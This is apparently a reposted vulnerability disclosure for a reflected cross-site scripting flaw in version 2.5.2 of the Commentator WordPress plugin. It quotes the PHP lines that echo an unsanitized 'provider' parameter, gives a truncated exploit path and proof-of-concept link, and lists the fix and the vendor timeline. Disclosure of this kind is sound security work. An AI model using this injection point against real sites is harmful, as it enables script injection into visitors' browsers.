#Product : Commentator Wordpress Plugin
#Exploit Author : Rahul Pratap Singh
#Version : 2.5.2
#Home page Link :
http://codecanyon.net/item/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/
#Date : 13/Jan/2016
XSS Vulnerability:
------------------------------
Description:
------------------------------
"provider" parameter is not sanitized that leads to Reflected XSS.
------------------------------
Vulnerable Code:
------------------------------
file: commentator.php
line:441
$provider_name = $_REQUEST["provider"];
line:544
<div id="commentator-social-signin" class="commentator-<?php echo
$provider_name; ?>">
------------------------------
Exploit:
------------------------------
/wp-admin/admin-ajax.php?
------------------------------
POC:
------------------------------
https://0x62626262.files.
Fix:
Update to 2.5.3
Disclosure Timeline:
reported to vendor : 9/1/2016
vendor response : 11/1/2016
vendor acknowledged : 11/1/2016
vendor deployed a patch: 11/1/2016
Pub ref:
http://codecanyon.net/item/
https://0x62626262.wordpress.
Komentarų nėra:
Rašyti komentarą